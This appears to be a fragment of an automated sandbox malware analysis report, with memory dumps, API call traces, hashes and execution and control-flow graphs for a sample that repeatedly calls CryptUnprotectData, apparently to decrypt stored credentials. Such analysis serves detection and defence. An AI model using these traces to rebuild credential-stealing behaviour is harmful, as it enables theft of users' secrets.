                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-224404859
                                                                                              • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                              • Instruction ID: 54f9e395c00b90dc5451f5026eb4b74e0c6c88693738feeaeea148d18d65316b
                                                                                              • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                              • Instruction Fuzzy Hash: C9D05EB34109209AD3227B04DC049EF77ADEF563107458467F800A21A0D3785C908AED
                                                                                              APIs
                                                                                                • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloclstrcpy
                                                                                              • String ID:
                                                                                              • API String ID: 852173138-0
                                                                                              • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                              • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                              • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                              • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                              • lstrcmpiA.KERNEL32(00405B82,00000000), ref: 00405970
                                                                                              • CharNextA.USER32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405981
                                                                                              • lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                              • Instruction ID: 6e6ac9e946d98d70bf9313254ac0794fd071748d29dfdc9c098e77395f368069
                                                                                              • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                              • Instruction Fuzzy Hash: B9F0C232504554EFC7029FA9DD0099EBBA8EF06260B2540B6E801F7210D274EE019BA9

                                                                                              Execution Graph

                                                                                              Execution Coverage:7.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:5.3%
                                                                                              Total number of Nodes:114
                                                                                              Total number of Limit Nodes:9
                                                                                              execution_graph 65964 36924590 65965 369245f8 CreateWindowExW 65964->65965 65967 369246b4 65965->65967 65967->65967 66090 36839970 66091 368399b6 GetCurrentProcess 66090->66091 66093 36839a01 66091->66093 66094 36839a08 GetCurrentThread 66091->66094 66093->66094 66095 36839a45 GetCurrentProcess 66094->66095 66096 36839a3e 66094->66096 66097 36839a7b 66095->66097 66096->66095 66098 36839aa3 GetCurrentThreadId 66097->66098 66099 36839ad4 66098->66099 65968 36928d18 65969 36929020 65968->65969 65970 36928d40 65968->65970 65971 36928d49 65970->65971 65974 3692826c 65970->65974 65973 36928d6c 65975 36928277 65974->65975 65976 36929063 65975->65976 65978 36928288 65975->65978 65976->65973 65979 36929098 OleInitialize 65978->65979 65980 369290fc 65979->65980 65980->65976 66100 36839bb8 DuplicateHandle 66101 36839c4e 66100->66101 65981 16e018 65982 16e024 65981->65982 65987 36747b78 65982->65987 65991 36747b69 65982->65991 65995 36747b77 65982->65995 65983 16e1d4 65989 36747b8f 65987->65989 65988 36748029 65988->65983 65989->65988 65999 36748431 65989->65999 65993 36747b70 65991->65993 65992 36748029 65992->65983 65993->65992 65994 36748431 CryptUnprotectData 65993->65994 65994->65993 65997 36747b8f 65995->65997 65996 36748029 65996->65983 65997->65996 65998 36748431 CryptUnprotectData 65997->65998 65998->65997 66000 36748440 65999->66000 66004 36748a59 66000->66004 66012 36748a68 66000->66012 66001 367484b0 66001->65989 66005 36748a5c 66004->66005 66008 36748b41 66005->66008 66009 36748a68 CryptUnprotectData 66005->66009 66010 36748a59 CryptUnprotectData 66005->66010 66020 36748c4a 66005->66020 66024 367487a8 66008->66024 66009->66008 66010->66008 66013 36748b41 66012->66013 66014 36748a8d 66012->66014 66015 367487a8 CryptUnprotectData 66013->66015 66014->66013 66017 36748a68 CryptUnprotectData 66014->66017 66018 36748a59 CryptUnprotectData 66014->66018 66019 36748c4a CryptUnprotectData 66014->66019 66016 36748d0d 66015->66016 66016->66001 66017->66013 66018->66013 66019->66013 66021 36748c5d 66020->66021 66022 367487a8 CryptUnprotectData 66021->66022 66023 36748d0d 66022->66023 66023->66008 66025 36748ef8 CryptUnprotectData 66024->66025 66026 36748d0d 66025->66026 66026->66001 66027 ad044 66028 ad05c 66027->66028 66029 ad0b6 66028->66029 66034 3692325c 66028->66034 66043 369254a3 66028->66043 66052 36924743 66028->66052 66056 36924748 66028->66056 66035 36923267 66034->66035 66036 36925509 66035->66036 66038 369254f9 66035->66038 66076 36923384 66036->66076 66060 3692562b 66038->66060 66065 369256fc 66038->66065 66071 36925630 66038->66071 66039 36925507 66044 369254a8 66043->66044 66045 36925509 66044->66045 66047 369254f9 66044->66047 66046 36923384 CallWindowProcW 66045->66046 66048 36925507 66046->66048 66049 36925630 CallWindowProcW 66047->66049 66050 3692562b CallWindowProcW 66047->66050 66051 369256fc CallWindowProcW 66047->66051 66049->66048 66050->66048 66051->66048 66053 36924748 66052->66053 66054 3692325c CallWindowProcW 66053->66054 66055 3692478f 66054->66055 66055->66029 66057 3692476e 66056->66057 66058 3692325c CallWindowProcW 66057->66058 66059 3692478f 66058->66059 66059->66029 66061 36925630 66060->66061 66080 369256e8 66061->66080 66083 369256e3 66061->66083 66062 369256d0 66062->66039 66066 369256ba 66065->66066 66067 3692570a 66065->66067 66069 369256e3 CallWindowProcW 66066->66069 66070 369256e8 CallWindowProcW 66066->66070 66068 369256d0 66068->66039 66069->66068 66070->66068 66072 36925644 66071->66072 66074 369256e3 CallWindowProcW 66072->66074 66075 369256e8 CallWindowProcW 66072->66075 66073 369256d0 66073->66039 66074->66073 66075->66073 66077 3692338f 66076->66077 66078 36926bea CallWindowProcW 66077->66078 66079 36926b99 66077->66079 66078->66079 66079->66039 66081 369256f9 66080->66081 66087 36926b2f 66080->66087 66081->66062 66084 369256e8 66083->66084 66085 369256f9 66084->66085 66086 36926b2f CallWindowProcW 66084->66086 66085->66062 66086->66085 66088 36923384 CallWindowProcW 66087->66088 66089 36926b3a 66088->66089 66089->66081

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 526 1676f1-167725 527 167b54-167b58 526->527 528 16772b-16774e 526->528 529 167b71-167b7f 527->529 530 167b5a-167b6e 527->530 537 167754-167761 528->537 538 1677fc-167800 528->538 535 167bf0-167c05 529->535 536 167b81-167b96 529->536 543 167c07-167c0a 535->543 544 167c0c-167c19 535->544 545 167b9d-167baa 536->545 546 167b98-167b9b 536->546 554 167763-16776e 537->554 555 167770 537->555 539 167802-167810 538->539 540 167848-167851 538->540 539->540 562 167812-16782d 539->562 547 167c67 540->547 548 167857-167861 540->548 550 167c1b-167c56 543->550 544->550 551 167bac-167bed 545->551 546->551 556 167c6c-167c9c 547->556 548->527 552 167867-167870 548->552 604 167c5d-167c64 550->604 560 167872-167877 552->560 561 16787f-16788b 552->561 557 167772-167774 554->557 555->557 589 167cb5-167cbc 556->589 590 167c9e-167cb4 556->590 557->538 564 16777a-1677dc 557->564 560->561 561->556 567 167891-167897 561->567 585 16782f-167839 562->585 586 16783b 562->586 613 1677e2-1677f9 564->613 614 1677de 564->614 569 167b3e-167b42 567->569 570 16789d-1678ad 567->570 569->547 574 167b48-167b4e 569->574 583 1678c1-1678c3 570->583 584 1678af-1678bf 570->584 574->527 574->552 587 1678c6-1678cc 583->587 584->587 588 16783d-16783f 585->588 586->588 587->569 591 1678d2-1678e1 587->591 588->540 592 167841 588->592 598 1678e7 591->598 599 16798f-1679ba call 167538 * 2 591->599 592->540 602 1678ea-1678fb 598->602 617 167aa4-167abe 599->617 618 1679c0-1679c4 599->618 602->556 606 167901-167913 602->606 606->556 608 167919-167933 call 1680d8 606->608 611 167939-167949 608->611 611->569 616 16794f-167952 611->616 613->538 614->613 619 167954-16795a 616->619 620 16795c-16795f 616->620 617->527 640 167ac4-167ac8 617->640 618->569 622 1679ca-1679ce 618->622 619->620 623 167965-167968 619->623 620->547 620->623 625 1679f6-1679fc 622->625 626 1679d0-1679dd 622->626 627 167970-167973 623->627 628 16796a-16796e 623->628 629 167a37-167a3d 625->629 630 1679fe-167a02 625->630 643 1679df-1679ea 626->643 644 1679ec 626->644 627->547 631 167979-16797d 627->631 628->627 628->631 634 167a3f-167a43 629->634 635 167a49-167a4f 629->635 630->629 633 167a04-167a0d 630->633 631->547 632 167983-167989 631->632 632->599 632->602 638 167a0f-167a14 633->638 639 167a1c-167a32 633->639 634->604 634->635 641 167a51-167a55 635->641 642 167a5b-167a5d 635->642 638->639 639->569 646 167b04-167b08 640->646 647 167aca-167ad4 call 1663e0 640->647 641->569 641->642 648 167a92-167a94 642->648 649 167a5f-167a68 642->649 645 1679ee-1679f0 643->645 644->645 645->569 645->625 646->604 654 167b0e-167b12 646->654 647->646 659 167ad6-167aeb 647->659 648->569 652 167a9a-167aa1 648->652 650 167a77-167a8d 649->650 651 167a6a-167a6f 649->651 650->569 651->650 654->604 657 167b18-167b25 654->657 663 167b27-167b32 657->663 664 167b34 657->664 659->646 668 167aed-167b02 659->668 665 167b36-167b38 663->665 664->665 665->569 665->604 668->527 668->646
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                              • API String ID: 0-1932283790
                                                                                              • Opcode ID: 0b92e920101efb092732e9d46b1cef2476733379372535906b9bac08f5069440
                                                                                              • Instruction ID: bb907492b70db0db08257e920b1a5d7f0d9abb49c37cc3cd97d7745d03635ebf
                                                                                              • Opcode Fuzzy Hash: 0b92e920101efb092732e9d46b1cef2476733379372535906b9bac08f5069440
                                                                                              • Instruction Fuzzy Hash: 21126A30A04219CFCB14CF69D884AAEBBF2FF49319F158599E859DB2A1D730ED51CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1035 166fc8-166ffe 1171 167000 call 166fc8 1035->1171 1172 167000 call 167118 1035->1172 1036 167006-16700c 1037 16700e-167012 1036->1037 1038 16705c-167060 1036->1038 1039 167014-167019 1037->1039 1040 167021-167028 1037->1040 1041 167077-16708b 1038->1041 1042 167062-167071 1038->1042 1039->1040 1043 1670fe-16713b 1040->1043 1044 16702e-167035 1040->1044 1167 16708d call 169dd0 1041->1167 1168 16708d call 16a088 1041->1168 1169 16708d call 16a0e8 1041->1169 1045 167073-167075 1042->1045 1046 16709d-1670a7 1042->1046 1056 167146-167166 1043->1056 1057 16713d-167143 1043->1057 1044->1038 1050 167037-16703b 1044->1050 1047 167093-16709a 1045->1047 1048 1670b1-1670b5 1046->1048 1049 1670a9-1670af 1046->1049 1052 1670bd-1670f7 1048->1052 1053 1670b7 1048->1053 1049->1052 1054 16703d-167042 1050->1054 1055 16704a-167051 1050->1055 1052->1043 1053->1052 1054->1055 1055->1043 1058 167057-16705a 1055->1058 1063 16716d-167174 1056->1063 1064 167168 1056->1064 1057->1056 1058->1047 1067 167176-167181 1063->1067 1066 1674fc-167505 1064->1066 1068 167187-16719a 1067->1068 1069 16750d-167519 1067->1069 1074 1671b0-1671cb 1068->1074 1075 16719c-1671aa 1068->1075 1076 167531-167536 1069->1076 1077 16751b-167521 1069->1077 1083 1671ef-1671f2 1074->1083 1084 1671cd-1671d3 1074->1084 1075->1074 1082 167484-16748b 1075->1082 1078 167523-16752f 1077->1078 1079 167539-167549 1077->1079 1078->1076 1091 167552-167556 1079->1091 1092 16754b-167550 1079->1092 1082->1066 1088 16748d-16748f 1082->1088 1089 16734c-167352 1083->1089 1090 1671f8-1671fb 1083->1090 1086 1671d5 1084->1086 1087 1671dc-1671df 1084->1087 1086->1087 1086->1089 1093 167212-167218 1086->1093 1094 16743e-167441 1086->1094 1087->1093 1095 1671e1-1671e4 1087->1095 1096 167491-167496 1088->1096 1097 16749e-1674a4 1088->1097 1089->1094 1098 167358-16735d 1089->1098 1090->1089 1099 167201-167207 1090->1099 1100 16755c-16755d 1091->1100 1092->1100 1101 16721e-167220 1093->1101 1102 16721a-16721c 1093->1102 1103 167447-16744d 1094->1103 1104 167508 1094->1104 1105 16727e-167284 1095->1105 1106 1671ea 1095->1106 1096->1097 1097->1069 1107 1674a6-1674ab 1097->1107 1098->1094 1099->1089 1108 16720d 1099->1108 1110 16722a-167233 1101->1110 1102->1110 1111 167472-167476 1103->1111 1112 16744f-167457 1103->1112 1104->1069 1105->1094 1109 16728a-167290 1105->1109 1106->1094 1113 1674f0-1674f3 1107->1113 1114 1674ad-1674b2 1107->1114 1108->1094 1115 167296-167298 1109->1115 1116 167292-167294 1109->1116 1118 167246-16726e 1110->1118 1119 167235-167240 1110->1119 1111->1082 1120 167478-16747e 1111->1120 1112->1069 1117 16745d-16746c 1112->1117 1113->1104 1121 1674f5-1674fa 1113->1121 1114->1104 1122 1674b4 1114->1122 1124 1672a2-1672b9 1115->1124 1116->1124 1117->1074 1117->1111 1142 167274-167279 1118->1142 1143 167362-167398 1118->1143 1119->1094 1119->1118 1120->1067 1120->1082 1121->1066 1121->1088 1123 1674bb-1674c0 1122->1123 1125 1674e2-1674e4 1123->1125 1126 1674c2-1674c4 1123->1126 1135 1672e4-16730b 1124->1135 1136 1672bb-1672d4 1124->1136 1125->1104 1133 1674e6-1674e9 1125->1133 1130 1674c6-1674cb 1126->1130 1131 1674d3-1674d9 1126->1131 1130->1131 1131->1069 1134 1674db-1674e0 1131->1134 1133->1113 1134->1125 1138 1674b6-1674b9 1134->1138 1135->1104 1147 167311-167314 1135->1147 1136->1143 1148 1672da-1672df 1136->1148 1138->1104 1138->1123 1142->1143 1149 1673a5-1673ad 1143->1149 1150 16739a-16739e 1143->1150 1147->1104 1151 16731a-167343 1147->1151 1148->1143 1149->1104 1154 1673b3-1673b8 1149->1154 1152 1673a0-1673a3 1150->1152 1153 1673bd-1673c1 1150->1153 1151->1143 1166 167345-16734a 1151->1166 1152->1149 1152->1153 1155 1673c3-1673c9 1153->1155 1156 1673e0-1673e4 1153->1156 1154->1094 1155->1156 1158 1673cb-1673d3 1155->1158 1159 1673e6-1673ec 1156->1159 1160 1673ee-16740d call 1676f1 1156->1160 1158->1104 1161 1673d9-1673de 1158->1161 1159->1160 1163 167413-167417 1159->1163 1160->1163 1161->1094 1163->1094 1164 167419-167435 1163->1164 1164->1094 1166->1143 1167->1047 1168->1047 1169->1047 1171->1036 1172->1036
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o^q$(o^q$,bq$,bq
                                                                                              • API String ID: 0-879173519
                                                                                              • Opcode ID: fa397ba2d7cc67eac953d0bb8ae25e8dd16384672b019045743ae588efc73c0b
                                                                                              • Instruction ID: d5c73732ff3b972642d4036b6fc6ebd840e405d8173a8186094e4513ace205fc
                                                                                              • Opcode Fuzzy Hash: fa397ba2d7cc67eac953d0bb8ae25e8dd16384672b019045743ae588efc73c0b
                                                                                              • Instruction Fuzzy Hash: EC025F70A04219DFCB15CF69CC94AADBBB2FF49304F258469E815AB3A1DB30DD51CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: N
                                                                                              • API String ID: 0-1130791706
                                                                                              • Opcode ID: 6371a9c3f4d47fc24f9a69d21c3a9fafc3eae46b48ffbd24a81ecc68df494fec
                                                                                              • Instruction ID: b082da23eeab954e35d5aed6f08aba8b2c69fa59a1c5ddb1d4d9174451edaafe
                                                                                              • Opcode Fuzzy Hash: 6371a9c3f4d47fc24f9a69d21c3a9fafc3eae46b48ffbd24a81ecc68df494fec
                                                                                              • Instruction Fuzzy Hash: 6073F731C1075A8EDB10EF68C854A99F7B1FF99300F51D69AE4497B221EB70AAD4CF81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o^q$4'^q
                                                                                              • API String ID: 0-273632683
                                                                                              • Opcode ID: 80201e093efece3fd28994a9eed4b118a05b2bc86550b7cd27af5ac8477f9320
                                                                                              • Instruction ID: 53f7433c271e3edffc05cdc887c0a37ed5220bce241d24ebdd02bc2d5cdfea6b
                                                                                              • Opcode Fuzzy Hash: 80201e093efece3fd28994a9eed4b118a05b2bc86550b7cd27af5ac8477f9320
                                                                                              • Instruction Fuzzy Hash: 83826F35A00209DFCB15CFA8C994AAEBBF2FF88310F55855AE406AB261D731ED91CF51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,bq$,bq
                                                                                              • API String ID: 0-2699258169
                                                                                              • Opcode ID: 138fb62435e73c8399c322e3cdd8deb7d0f77ebd2a5cf1e15ef66107d7d0c97f
                                                                                              • Instruction ID: 8fa1a847cab77c549025c8b1aef18e4982327a9e2439c80813e009c2c56dd0b3
                                                                                              • Opcode Fuzzy Hash: 138fb62435e73c8399c322e3cdd8deb7d0f77ebd2a5cf1e15ef66107d7d0c97f
                                                                                              • Instruction Fuzzy Hash: B4818E74A00505DFCB18CF69DC849AABBF2BF89305B258169D406EB375DB31EC61CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: 5a1b1d45b3cfe8ddd66ded307ce1730569e16ae612cae5c97aef2da15be7f4f2
                                                                                              • Instruction ID: 0b6f83b16a68b67984118f168fa7cf638aadbf3493708e3e0f413d42291d9d04
                                                                                              • Opcode Fuzzy Hash: 5a1b1d45b3cfe8ddd66ded307ce1730569e16ae612cae5c97aef2da15be7f4f2
                                                                                              • Instruction Fuzzy Hash: 5FA1D674E01258CFDB14DFA9D894AADBBF2BF89300F15806AE849AB361DB309941CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: e584580e2c930464e12b00893c547b49d0b4d84160abfc36073491516223669c
                                                                                              • Instruction ID: b36e77cb9b90d8223e9bd160cd4fbf1a1e8e37cb8dcc91a9114f0bacc007e44f
                                                                                              • Opcode Fuzzy Hash: e584580e2c930464e12b00893c547b49d0b4d84160abfc36073491516223669c
                                                                                              • Instruction Fuzzy Hash: F291C674E01658CFDB18DFA9D884A9DBBF2FF89300F15806AE409AB361DB309985CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: 2067f8b171f6292e9b82f4f03d437fc9547d69a39be94b05c0511b1f3bc0aa5c
                                                                                              • Instruction ID: 3a764e8a8733c306bf8f116319b92a94ee19f0353f11676d4072d70887ee7f5e
                                                                                              • Opcode Fuzzy Hash: 2067f8b171f6292e9b82f4f03d437fc9547d69a39be94b05c0511b1f3bc0aa5c
                                                                                              • Instruction Fuzzy Hash: CE81A574E00218CFDB18DFAAC994AADBBF2BF89300F14D06AE459AB365DB345945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: a6ce37a9bb918e67a3989c281ee87f11e60270530ea14260c91af8ef716a55d7
                                                                                              • Instruction ID: 567d04035214b6a8047b52528f73d179ce993f73b96142ab0251e8c98c5e27e5
                                                                                              • Opcode Fuzzy Hash: a6ce37a9bb918e67a3989c281ee87f11e60270530ea14260c91af8ef716a55d7
                                                                                              • Instruction Fuzzy Hash: 6681B374E00218CFDB18DFAAC884AADBBF2BF89300F14C069E859AB365DB355945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH^q$PH^q
                                                                                              • API String ID: 0-1598597984
                                                                                              • Opcode ID: f7cfad0b7a8e081fac50bc2c4ba19f46758c8b020f35804f587493b31dc3888c
                                                                                              • Instruction ID: c53f44e4b0a4585719edef6d5e81bca6aa9823a51ea8f7f6831cbb34bca25dd7
                                                                                              • Opcode Fuzzy Hash: f7cfad0b7a8e081fac50bc2c4ba19f46758c8b020f35804f587493b31dc3888c
                                                                                              • Instruction Fuzzy Hash: 7581A2B4E00218CFDB18DFAAD894A9DBBF2BF89300F148069E859AB365DB345D45CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
